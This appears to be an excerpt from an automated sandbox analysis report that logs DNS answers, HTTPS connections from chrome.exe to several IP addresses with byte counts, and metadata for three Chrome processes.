Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 54.145.102.19 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 44.206.124.177 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 18.215.21.8 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 34.237.47.184 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:24.242923975 CET | 1.1.1.1 | 192.168.2.6 | 0x3bb8 | No error (0) | nordicplow.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:24.242923975 CET | 1.1.1.1 | 192.168.2.6 | 0x3bb8 | No error (0) | 192.124.249.155 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:24.392534971 CET | 1.1.1.1 | 192.168.2.6 | 0xce67 | No error (0) | nordicplow.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:25.165555000 CET | 1.1.1.1 | 192.168.2.6 | 0x9107 | No error (0) | 185.15.59.240 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:26.400921106 CET | 1.1.1.1 | 192.168.2.6 | 0xd072 | No error (0) | 185.15.59.240 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:27.839629889 CET | 1.1.1.1 | 192.168.2.6 | 0x861e | No error (0) | nordicplow.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:27.839629889 CET | 1.1.1.1 | 192.168.2.6 | 0x861e | No error (0) | 192.124.249.155 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:27.842057943 CET | 1.1.1.1 | 192.168.2.6 | 0x306 | No error (0) | nordicplow.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:38.668438911 CET | 1.1.1.1 | 192.168.2.6 | 0x28f2 | No error (0) | 65 | IN (0x0001) | false | |||
Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:38.668883085 CET | 1.1.1.1 | 192.168.2.6 | 0x3aea | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:39.270199060 CET | 1.1.1.1 | 192.168.2.6 | 0xc20e | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:39.272507906 CET | 1.1.1.1 | 192.168.2.6 | 0xbbc | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:39.273425102 CET | 1.1.1.1 | 192.168.2.6 | 0xc186 | No error (0) | 65 | IN (0x0001) | false | |||
Jan 14, 2025 18:22:40.262018919 CET | 1.1.1.1 | 192.168.2.6 | 0x7ec6 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49716 | 34.233.109.53 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:24 UTC | 679 | OUT | |
2025-01-14 17:22:24 UTC | 506 | IN | |
2025-01-14 17:22:24 UTC | 1266 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.6 | 49724 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:24 UTC | 731 | OUT | |
2025-01-14 17:22:25 UTC | 468 | IN | |
2025-01-14 17:22:25 UTC | 5875 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.6 | 49731 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:25 UTC | 623 | OUT | |
2025-01-14 17:22:26 UTC | 1080 | IN | |
2025-01-14 17:22:26 UTC | 272 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.6 | 49730 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:25 UTC | 622 | OUT | |
2025-01-14 17:22:26 UTC | 1081 | IN | |
2025-01-14 17:22:26 UTC | 5094 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.6 | 49723 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:26 UTC | 620 | OUT | |
2025-01-14 17:22:27 UTC | 630 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.6 | 49740 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:27 UTC | 385 | OUT | |
2025-01-14 17:22:27 UTC | 1080 | IN | |
2025-01-14 17:22:27 UTC | 272 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.6 | 49741 | 185.15.59.240 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:27 UTC | 384 | OUT | |
2025-01-14 17:22:27 UTC | 1081 | IN | |
2025-01-14 17:22:27 UTC | 5094 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.6 | 49748 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:27 UTC | 652 | OUT | |
2025-01-14 17:22:27 UTC | 516 | IN | |
2025-01-14 17:22:27 UTC | 4119 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.6 | 49751 | 192.124.249.155 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:28 UTC | 385 | OUT | |
2025-01-14 17:22:28 UTC | 516 | IN | |
2025-01-14 17:22:28 UTC | 4119 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.6 | 49827 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:39 UTC | 559 | OUT | |
2025-01-14 17:22:39 UTC | 463 | IN | |
2025-01-14 17:22:39 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.6 | 49832 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:39 UTC | 349 | OUT | |
2025-01-14 17:22:39 UTC | 430 | IN | |
2025-01-14 17:22:39 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:39 UTC | 794 | OUT | |
2025-01-14 17:22:40 UTC | 388 | IN | |
2025-01-14 17:22:40 UTC | 478 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.6 | 49839 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:40 UTC | 584 | OUT | |
2025-01-14 17:22:41 UTC | 388 | IN | |
2025-01-14 17:22:41 UTC | 478 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.6 | 49909 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:51 UTC | 559 | OUT | |
2025-01-14 17:22:51 UTC | 463 | IN | |
2025-01-14 17:22:51 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.6 | 49912 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:51 UTC | 349 | OUT | |
2025-01-14 17:22:51 UTC | 430 | IN | |
2025-01-14 17:22:51 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.6 | 49911 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:51 UTC | 794 | OUT | |
2025-01-14 17:22:52 UTC | 388 | IN | |
2025-01-14 17:22:52 UTC | 478 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.6 | 49918 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:22:52 UTC | 584 | OUT | |
2025-01-14 17:22:53 UTC | 388 | IN | |
2025-01-14 17:22:53 UTC | 478 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.6 | 50000 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:23:06 UTC | 559 | OUT | |
2025-01-14 17:23:06 UTC | 463 | IN | |
2025-01-14 17:23:06 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.6 | 50005 | 104.26.12.205 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:23:06 UTC | 349 | OUT | |
2025-01-14 17:23:07 UTC | 431 | IN | |
2025-01-14 17:23:07 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.6 | 50004 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:23:07 UTC | 794 | OUT | |
2025-01-14 17:23:07 UTC | 388 | IN | |
2025-01-14 17:23:07 UTC | 478 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
20 | 192.168.2.6 | 50006 | 149.154.167.220 | 443 | 6212 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:23:08 UTC | 584 | OUT | |
2025-01-14 17:23:08 UTC | 388 | IN | |
2025-01-14 17:23:08 UTC | 478 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 1 |
Start time: | 12:22:11 |
Start date: | 14/01/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff684c40000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 3 |
Start time: | 12:22:16 |
Start date: | 14/01/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff684c40000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 4 |
Start time: | 12:22:22 |
Start date: | 14/01/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff684c40000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |